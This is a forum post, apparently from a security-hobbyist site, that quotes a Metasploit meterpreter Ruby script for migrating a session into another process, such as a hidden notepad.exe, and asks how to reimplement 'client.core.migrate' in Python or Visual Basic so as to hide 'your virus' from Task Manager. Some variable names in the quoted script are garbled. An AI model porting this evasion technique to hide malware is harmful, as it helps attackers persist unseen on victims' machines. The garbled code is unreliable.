Meterpreter Migrate Help Pls

Jun 22, 2018 02:50 PM
Jun 22, 2018 02:51 PM
636652503125483478.jpg

##

# WARNING: **sploit no longer maintains or accepts meterpreter scripts.

# If you'd like to imporve this script, please try to port it as a post

# module instead. Thank you.

##

#

# Simple example script that migrates to a specific process by name.

# This is meant as an illustration.

#

spawn = false

kill = false

target_pid = nil

target_name = nil

opts = Rex::Parser::Arguments.new(

"-h" => false, "Help menu." ,

"-f" => false, "Launch a process and migrate into the new process",

"-p" => true , "PID to migrate to.",

"-k" => false, "Kill original process.",

"-n" => true, "Migrate into the first process with this executable name (explorer.exe)"

)

opts.parse(args) { |opt, idx, val|

case opt

when "-f"

spawn = true

when "-k"

kill = true

when "-p"

targetpid = val.toi

when "-n"

targetname = val.tos

when "-h"

print_line(opts.usage)

raise Rex::Script::Completed

else

print_line(opts.usage)

raise Rex::Script::Completed

end

}

# Creates a temp notepad.exe to migrate to depending the architecture.

def createtempproc()

# Use the system path for executable to run

cmd = "notepad.exe"

# run hidden

proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })

return proc.pid

end

# In case no option is provided show help

if args.length == 0

print_line(opts.usage)

raise Rex::Script::Completed

end

### Main ###

if client.platform == 'windows'

server = client.sys.process.open

original_pid = server.pid

print_status("Current server process: #{server.name} (#{server.pid})")

if spawn

print_status("Spawning notepad.exe process to migrate to")

targetpid = createtemp_proc

end

if targetname and not targetpid

target_pid = client.sys.processtarget_name

if not target_pid

printstatus("Could not identify the process ID for #{targetname}")

raise Rex::Script::Completed

end

end

begin

printgood("Migrating to #{targetpid}")

client.core.migrate(target_pid)

print_good("Successfully migrated to process #{}")

rescue ::Exception => e

print_error("Could not migrate in to process.")

print_error(e)

end

if kill

printstatus("Killing original process with PID #{originalpid}")

client.sys.process.kill(original_pid)

printgood("Successfully killed process with PID #{originalpid}")

end

end

— Metasploit

Langugage = RUBY

Friends The code you see above is a code taken from metasploit in Linux. Most of Metasploit Users Know When you take Payload to the other side and listen to it, you can hide your virus from places like Task Manager with "migrate" command or you can show it like another program.

I've studied these codes, and actually it's an easy code with 96 lines. Of all the 96 lines of code, only 1 line does the actual job.

client.core.migrate(target_pid)

in the above code there is a variable named "target_pid" and this is the value of the program "PID" we want to hide. So far I have no problem with the main responsibility of how to do this in visual basic or python. what is actually client.core.migrate? In python or visual basic How do I use it?

Sorry My English may be bad.

Just updated your iPhone? You'll find new Apple Intelligence capabilities, sudoku puzzles, Camera Control enhancements, volume control limits, layered Voice Memo recordings, and other useful features. Find out what's new and changed on your iPhone with the iOS 18.2 update.

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!